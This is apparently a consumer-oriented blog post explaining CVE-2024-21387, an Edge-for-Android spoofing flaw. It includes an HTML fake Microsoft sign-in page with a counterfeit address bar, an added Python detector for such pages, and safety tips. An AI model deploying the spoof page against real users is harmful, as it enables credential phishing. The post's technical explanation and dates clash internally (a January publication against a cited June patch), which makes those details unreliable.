In the fast-changing world of cybersecurity, mobile browsers are quickly becoming prime targets for attackers. One of the latest threats goes by the name CVE-2024-21387. This vulnerability affects Microsoft Edge on Android devices and opens the door for attackers to carry out security spoofing attacks—putting your private data and online security at risk. In this post, we’ll break down what CVE-2024-21387 is, how it works, and what you need to do to stay safe. We’ll keep it simple and easy to understand, so you don't have to be a tech expert to get the essentials.

What is CVE-2024-21387?

CVE-2024-21387 is a spoofing vulnerability discovered in Microsoft Edge on Android. Spoofing attacks trick users into thinking they’re seeing or interacting with something trustworthy (like a real login page or a trusted website) when, in fact, it’s an attacker’s fake version. If you fall for the trick, attackers could steal your data, such as passwords, or get you to download malware.

Microsoft listed this vulnerability in their official security update guide:
🔗 Microsoft Security Update Guide - CVE-2024-21387

How Does the Vulnerability Work?

This vulnerability exists because Microsoft Edge for Android doesn’t properly validate parts of a website’s content or URL. An attacker could create a specially-crafted webpage that, when opened in Edge, displays a fake URL, hides the real web address, or shows trusted visual elements from a website (like logos) while loading their own malicious content.

For a simple analogy, imagine you get a letter in the mail that *looks* like it’s from your bank, right down to the official envelope and logo. But when you look closer, you realize it’s a clever fake designed to steal your account details. That’s what this spoof allows attackers to do—digitally.

Proof-of-Concept (PoC) Code

To help understand how this exploit works, here’s a simplified code snippet of a spoofing web page that could fool Microsoft Edge on Android:

<!-- Save as spoof.html and open in Edge for Android -->
<!DOCTYPE html>
<html>
<head>
    <title>Microsoft Account</title>
    <style>
        body {
            font-family: 'Segoe UI', Arial, sans-serif;
            margin: 0; padding: 0;
            background-color: #f3f3f3;
        }
        /* Imitates the Edge toolbar: this is page content, not browser chrome */
        .header {
            background-color: #2F2F2F;
            color: #fff;
            padding: 12px 20px;
        }
        /* Fake address bar drawn by the page itself */
        .url-bar {
            background-color: #f8f8f8;
            color: #039be5;
            padding: 6px 20px;
            font-size: 16px;
        }
        .container {
            margin: 32px auto;
            max-width: 350px;
            background: white;
            padding: 28px;
            box-shadow: 0 0 8px rgba(0,0,0,.12);
            border-radius: 8px;
        }
        /* Stack the form fields one per line */
        input { display: block; width: 100%; margin-bottom: 12px; }
    </style>
</head>
<body>
    <div class="header">Microsoft Edge</div>
    <div class="url-bar">https://login.microsoft.com</div>
    <div class="container">
        <h3>Sign in</h3>
        <form>
            <input type="text" placeholder="Email or phone" required>
            <input type="password" placeholder="Password" required>
            <button type="submit">Next</button>
        </form>
    </div>
</body>
</html>

Note: The url-bar at the top is *not* the real browser address bar. But a victim might believe they're at login.microsoft.com!

Why does this work?
Microsoft Edge for Android—with this vulnerability—might not properly alert the user that they're seeing content that simulates the real Edge UI and address bar, allowing such a fake page to fool users.

When opened in Microsoft Edge for Android, the victim sees a webpage that *looks* like a genuine Microsoft login page, complete with a fake address bar—a realistic spoof.
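A defender-side check that follows from the fake url-bar above, written here as an added example (it is not code from the original post or from Microsoft): a small Python triage script parses a captured page, pulls out any URL-looking text that is rendered as ordinary page content, and compares the host it displays with the host the page was actually served from; it also records whether the page asks for a password, since a fake address bar next to a credential form is the combination this spoof relies on. The page URL and HTML below are constructed samples modelled on the spoof page; hostnames such as attacker.example are placeholders.

```python
"""Heuristic triage check for pages that paint their own address bar.

Added example, not the post's or Microsoft's code. Input: the URL a page
was really fetched from plus its HTML. Output: URL-looking text shown to
the user whose host differs from the real host, and whether the page
contains a password field.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Matches text that a user would read as a web address.
URL_TEXT = re.compile(r"""https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s<>"']*)?""")


class _VisibleTextCollector(HTMLParser):
    """Collect visible text nodes and note any password input."""

    SKIP = {"script", "style", "noscript", "title"}  # not rendered as body text

    def __init__(self):
        super().__init__()
        self.texts = []
        self.has_password_input = False
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1
        if tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.has_password_input = True

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth and data.strip():
            self.texts.append(data.strip())


def find_fake_address_bars(page_url, html):
    """Return (suspicious_urls, asks_for_password).

    A URL rendered as page text is suspicious when its hostname is not the
    hostname the page was actually loaded from.
    """
    real_host = (urlparse(page_url).hostname or "").lower()
    parser = _VisibleTextCollector()
    parser.feed(html)
    suspicious = []
    for text in parser.texts:
        for shown in URL_TEXT.findall(text):
            shown_host = (urlparse(shown).hostname or "").lower()
            if shown_host and shown_host != real_host:
                suspicious.append({"shown": shown, "shown_host": shown_host,
                                   "real_host": real_host})
    return suspicious, parser.has_password_input


def assess(page_url, html):
    """Combine the two signals into a verdict string for a triage queue."""
    fakes, asks_password = find_fake_address_bars(page_url, html)
    if fakes and asks_password:
        return "high: fake address bar plus credential form"
    if fakes:
        return "medium: URL text for another host rendered in page"
    return "low: no spoofed address bar found"


# Constructed sample modelled on the spoof page above (not a real capture).
SPOOF_HTML = """<!DOCTYPE html><html><head><title>Microsoft Account</title>
<style>.url-bar{color:#039be5}</style></head><body>
<div class="header">Microsoft Edge</div>
<div class="url-bar">https://login.microsoft.com</div>
<form><input type="text" placeholder="Email or phone" required>
<input type="password" placeholder="Password" required>
<button type="submit">Next</button></form></body></html>"""

# Constructed sample: a page that merely links to another site, no login form.
LINK_ONLY_HTML = """<html><body><p>See https://docs.example.org/guide for help.</p>
</body></html>"""

if __name__ == "__main__":
    # attacker.example is a placeholder for wherever the spoof page really lives
    print(assess("https://attacker.example/spoof.html", SPOOF_HTML))
    print(assess("https://login.microsoft.com/", SPOOF_HTML))
    print(assess("https://blog.example.net/post", LINK_ONLY_HTML))
```

The check is deliberately narrow: a site that prints its own address is not flagged because the displayed host equals the real one, and a fake bar drawn as an image rather than text would slip past it. It is meant as one signal in a phishing-page triage pipeline, not as a replacement for patching Edge.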

References

Microsoft Security Update Guide: CVE-2024-21387
NIST National Vulnerability Database entry: NVD - CVE-2024-21387
Microsoft Patch Tuesday, June 2024 Overview: BleepingComputer coverage

How to Stay Safe

Update Microsoft Edge: Microsoft has released patches for this vulnerability. Go to the Google Play Store and make sure Microsoft Edge is updated to the latest version.

Check the Real Address Bar: On mobile, it’s easy to get fooled by fake elements on a web page. Always look for the browser’s actual address bar, not the page itself.

Be Careful with Links: Don’t click on unexpected links in emails, texts, or messaging apps—especially if they request login details or personal info.

Conclusion

CVE-2024-21387 is a reminder that mobile browsers can be just as vulnerable as desktop ones. Spoofing flaws like this one are especially dangerous because they rely on fooling you, the user. Your best defense is to keep your apps updated and stay vigilant about which sites you trust—especially when entering passwords or sensitive data.

Stay safe, and spread the word!

*For exclusive updates and more simple security explanations, consider bookmarking this page or following reliable vulnerability trackers like MSRC and NVD.*

Timeline

Published on: 01/26/2024 01:15:10 UTC
Last modified on: 01/31/2024 20:08:28 UTC